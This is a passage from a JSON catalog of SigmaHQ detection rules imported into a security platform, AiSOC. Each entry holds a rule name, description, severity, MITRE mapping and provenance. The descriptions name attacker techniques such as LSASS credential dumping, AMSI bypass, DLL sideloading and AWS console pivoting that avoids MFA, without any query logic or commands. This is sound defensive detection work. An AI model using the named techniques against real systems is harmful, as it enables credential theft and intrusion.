"sigmahq-sigma-f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", "type": "detection", "name": "Registry Entries For Azorult Malware", "description": "Detects the presence of a registry key created during Azorult execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/registry-entries-for-azorult-malware.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_mal_azorult.yml" } }, { "id": "sigmahq-sigma-f8103686-e3e8-46f3-be72-65f7fcb4aa53", "type": "detection", "name": "AWS Console GetSigninToken Potential Abuse", "description": "Detects potentially suspicious events involving \"GetSigninToken\".\nAn adversary using the \"aws_consoler\" tool can leverage this console API to create temporary federated credential that help obfuscate which AWS credential is compromised (the original access key) and enables the adversary to pivot from the AWS CLI to console sessions without the need for MFA using the new access key issued in this request.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.007", "T1550.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-console-getsignintoken-potential-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f8103686-e3e8-46f3-be72-65f7fcb4aa53", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_console_getsignintoken.yml" } }, { "id": "sigmahq-sigma-f8341cb2-ee25-43fa-a975-d8a5a9714b39", "type": "detection", "name": "BPFtrace Unsafe Option Usage", "description": "Detects the usage of the unsafe bpftrace option", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bpftrace-unsafe-option-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f8341cb2-ee25-43fa-a975-d8a5a9714b39", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml" } }, { "id": "sigmahq-sigma-f8748f2c-89dc-4d95-afb0-5a2dfdbad332", "type": "detection", "name": "SAM Registry Hive Handle Request", "description": "Detects handles requested to SAM registry hive", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1012", "T1552.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sam-registry-hive-handle-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_sam_registry_hive_handle_request.yml" } }, { "id": "sigmahq-sigma-f88e112a-21aa-44bd-9b01-6ee2a2bbbed1", "type": "detection", "name": "Failed Logon From Public IP", "description": "Detects a failed logon attempt from a public IP. A login from a public IP can indicate a misconfigured firewall or network boundary.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078", "T1190", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/failed-logon-from-public-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f88e112a-21aa-44bd-9b01-6ee2a2bbbed1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/account_management/win_security_susp_failed_logon_source.yml" } }, { "id": "sigmahq-sigma-f8931561-97f5-4c46-907f-0a4a592e47a7", "type": "detection", "name": "CodeIntegrity - Unmet Signing Level Requirements By File Under Validation", "description": "Detects attempted file load events that did not meet the signing level requirements. It often means the file's signature is revoked or a signature with the Lifetime Signing EKU has expired.\nThis event is best correlated with EID 3089 to determine the error of the validation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/codeintegrity-unmet-signing-level-requirements-by-file-under-validation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f8931561-97f5-4c46-907f-0a4a592e47a7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml" } }, { "id": "sigmahq-sigma-f89b08d0-77ad-4728-817b-9b16c5a69c7a", "type": "detection", "name": "HackTool - SharpImpersonation Execution", "description": "Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1134.001", "T1134.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-sharpimpersonation-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f89b08d0-77ad-4728-817b-9b16c5a69c7a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_sharp_impersonation.yml" } }, { "id": "sigmahq-sigma-f8a56cb7-a363-44ed-a82f-5926bb44cd05", "type": "detection", "name": "BITS Transfer Job Download To Potential Suspicious Folder", "description": "Detects new BITS transfer job where the LocalName/Saved file is stored in a potentially suspicious location", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1197" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bits-transfer-job-download-to-potential-suspicious-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/bits_client/win_bits_client_new_trasnfer_susp_local_folder.yml" } }, { "id": "sigmahq-sigma-f8ad2e2c-40b6-4117-84d7-20b89896ab23", "type": "detection", "name": "Suspicious Scan Loop Network", "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059", "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-scan-loop-network.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f8ad2e2c-40b6-4117-84d7-20b89896ab23", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_network_scan_loop.yml" } }, { "id": "sigmahq-sigma-f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", "type": "detection", "name": "Hiding User Account Via SpecialAccounts Registry Key", "description": "Detects modifications to the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" where the value is set to \"0\" in order to hide user account from being listed on the logon screen.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1564.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hiding-user-account-via-specialaccounts-registry-key.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_special_accounts.yml" } }, { "id": "sigmahq-sigma-f8be3e82-46a3-4e4e-ada5-8e538ae8b9c9", "type": "detection", "name": "Credential Dumping Activity By Python Based Tool", "description": "Detects LSASS process access for potential credential dumping by a Python-like tool such as LaZagne or Pypykatz.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/credential-dumping-activity-by-python-based-tool.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f8be3e82-46a3-4e4e-ada5-8e538ae8b9c9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_access/proc_access_win_lsass_python_based_tool.yml" } }, { "id": "sigmahq-sigma-f8c1e80b-c73a-476a-ae24-6c72528b1521", "type": "detection", "name": "DNS Query To Common Malware Hosting and Shortener Services", "description": "Detects DNS queries to domains commonly used by threat actors to host malware payloads or redirect through URL shorteners.\nThese include platforms like Cloudflare Workers, TryCloudflare, InfinityFree, and URL shorteners such as tinyurl and lihi.cc.\nSuch DNS activity can indicate potential delivery or command-and-control communication attempts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-query-to-common-malware-hosting-and-shortener-services.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f8c1e80b-c73a-476a-ae24-6c72528b1521", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/dns_query/dns_query_win_common_malware_hosting_services.yml" } }, { "id": "sigmahq-sigma-f8d6a15e-4bc8-4c27-8e5d-2b10f0b73e5b", "type": "detection", "name": "Suspicious Powercfg Execution To Change Lock Screen Timeout", "description": "Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-powercfg-execution-to-change-lock-screen-timeout.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f8d6a15e-4bc8-4c27-8e5d-2b10f0b73e5b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powercfg_execution.yml" } }, { "id": "sigmahq-sigma-f8ed0e8f-7438-4b79-85eb-f358ef2fbebd", "type": "detection", "name": "Github Self Hosted Runner Changes Detected", "description": "A self-hosted runner is a system that you deploy and manage to execute jobs from GitHub Actions on GitHub.com.\nThis rule detects changes to self-hosted runners configurations in the environment. The self-hosted runner configuration changes once detected,\nit should be validated from GitHub UI because the log entry may not provide full context.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1526", "T1213.003", "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/github-self-hosted-runner-changes-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f8ed0e8f-7438-4b79-85eb-f358ef2fbebd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/github/audit/github_self_hosted_runner_changes_detected.yml" } }, { "id": "sigmahq-sigma-f91e51c9-f344-4b32-969b-0b6f6b8537d4", "type": "detection", "name": "Renamed Schtasks Execution", "description": "Detects the execution of renamed schtasks.exe binary, which is a legitimate Windows utility used for scheduling tasks.\nOne of the very common persistence techniques is schedule malicious tasks using schtasks.exe.\nSince, it is heavily abused, it is also heavily monitored by security products. To evade detection, threat actors may rename the schtasks.exe binary to schedule their malicious tasks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036.003", "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-schtasks-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f91e51c9-f344-4b32-969b-0b6f6b8537d4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_schtasks_execution.yml" } }, { "id": "sigmahq-sigma-f91ed517-a6ba-471d-9910-b3b4a398c0f3", "type": "detection", "name": "Potentially Suspicious Windows App Activity", "description": "Detects potentially suspicious child process of applications launched from inside the WindowsApps directory. This could be a sign of a rogue \".appx\" package installation/execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-windows-app-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f91ed517-a6ba-471d-9910-b3b4a398c0f3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_appx_execution.yml" } }, { "id": "sigmahq-sigma-f92a6f1e-a512-4a15-9735-da09e78d7273", "type": "detection", "name": "GatherNetworkInfo.VBS Reconnaissance Script Output", "description": "Detects creation of files which are the results of executing the built-in reconnaissance script \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/gathernetworkinfo-vbs-reconnaissance-script-output.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f92a6f1e-a512-4a15-9735-da09e78d7273", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_lolbin_gather_network_info_script_output.yml" } }, { "id": "sigmahq-sigma-f9405037-bc97-4eb7-baba-167dad399b83", "type": "detection", "name": "Github New Secret Created", "description": "Detects when a user creates action secret for the organization, environment, codespaces or repository.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/github-new-secret-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f9405037-bc97-4eb7-baba-167dad399b83", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/github/audit/github_new_secret_created.yml" } }, { "id": "sigmahq-sigma-f956c7c1-0f60-4bc5-b7d7-b39ab3c08908", "type": "detection", "name": "PktMon.EXE Execution", "description": "Detects execution of PktMon, a tool that captures network packets.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1040" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pktmon-exe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f956c7c1-0f60-4bc5-b7d7-b39ab3c08908", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pktmon_execution.yml" } }, { "id": "sigmahq-sigma-f9578658-9e71-4711-b634-3f9b50cd3c06", "type": "detection", "name": "Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 3", "description": "Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-defense-evasion-activity-via-emoji-usage-in-commandline-3.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f9578658-9e71-4711-b634-3f9b50cd3c06", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_emoji_usage_in_cli_3.yml" } }, { "id": "sigmahq-sigma-f99276ad-d122-4989-a09a-d00904a5f9d2", "type": "detection", "name": "Clear PowerShell History - PowerShell Module", "description": "Detects keywords that could indicate clearing PowerShell history", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/clear-powershell-history-powershell-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f99276ad-d122-4989-a09a-d00904a5f9d2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_clear_powershell_history.yml" } }, { "id": "sigmahq-sigma-f9999590-1f94-4a34-a91e-951e47bedefd", "type": "detection", "name": "Suspicious Provlaunch.EXE Child Process", "description": "Detects suspicious child processes of \"provlaunch.exe\" which might indicate potential abuse to proxy execution.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-provlaunch-exe-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f9999590-1f94-4a34-a91e-951e47bedefd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_provlaunch_susp_child_process.yml" } }, { "id": "sigmahq-sigma-f99abdf0-6283-4e71-bd2b-b5c048a94743", "type": "detection", "name": "Potentially Suspicious Office Document Executed From Trusted Location", "description": "Detects the execution of an Office application that points to a document that is located in a trusted location. Attackers often used this to avoid macro security and execute their malicious code.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-office-document-executed-from-trusted-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f99abdf0-6283-4e71-bd2b-b5c048a94743", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_office_exec_from_trusted_locations.yml" } }, { "id": "sigmahq-sigma-f9b3edc5-3322-4fc7-8aa3-245d646cc4b7", "type": "detection", "name": "Potential Linux Amazon SSM Agent Hijacking", "description": "Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-linux-amazon-ssm-agent-hijacking.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f9b3edc5-3322-4fc7-8aa3-245d646cc4b7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_ssm_agent_abuse.yml" } }, { "id": "sigmahq-sigma-f9df325d-d7bc-4a32-8a1a-2cc61dcefc63", "type": "detection", "name": "Third Party Software DLL Sideloading", "description": "Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/third-party-software-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f9df325d-d7bc-4a32-8a1a-2cc61dcefc63", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_third_party.yml" } }, { "id": "sigmahq-sigma-fa00b701-44c6-4679-994d-5a18afa8a707", "type": "detection", "name": "PUA - AdvancedRun Suspicious Execution", "description": "Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1134.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-advancedrun-suspicious-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fa00b701-44c6-4679-994d-5a18afa8a707", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user.yml" } }, { "id": "sigmahq-sigma-fa0c05b6-8ad3-468d-8231-c1cbccb64fba", "type": "detection", "name": "Antivirus Hacktool Detection", "description": "Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool.\nThis event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/antivirus-hacktool-detection.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fa0c05b6-8ad3-468d-8231-c1cbccb64fba", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/category/antivirus/av_hacktool.yml" } }, { "id": "sigmahq-sigma-fa1a7e52-3d02-435b-81b8-00da14dd66c1", "type": "detection", "name": "Diskshadow Script Mode - Execution From Potential Suspicious Location", "description": "Detects execution of \"Diskshadow.exe\" in script mode using the \"/s\" flag where the script is located in a potentially suspicious location.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/diskshadow-script-mode-execution-from-potential-suspicious-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fa1a7e52-3d02-435b-81b8-00da14dd66c1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_diskshadow_script_mode_susp_location.yml" } }, { "id": "sigmahq-sigma-fa2559c8-1197-471d-9cdd-05a0273d4522", "type": "detection", "name": "Potential AMSI Bypass Script Using NULL Bits", "description": "Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-amsi-bypass-script-using-null-bits.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fa2559c8-1197-471d-9cdd-05a0273d4522", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_amsi_null_bits_bypass.yml" } }, { "id": "sigmahq-sigma-fa277e82-9b78-42dd-b05c-05555c7b6015", "type": "detection", "name": "Enable Local Manifest Installation With Winget", "description": "Detects changes to the AppInstaller (winget) policy. Specifically the activation of the local manifest installation, which allows a user to install new packages via custom manifests.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/enable-local-manifest-installation-with-winget.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fa277e82-9b78-42dd-b05c-05555c7b6015", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_winget_enable_local_manifest.yml" } }, { "id": "sigmahq-sigma-fa3c117a-bc0d-416e-a31b-0c0e80653efb", "type": "detection", "name": "Chopper Webshell Process 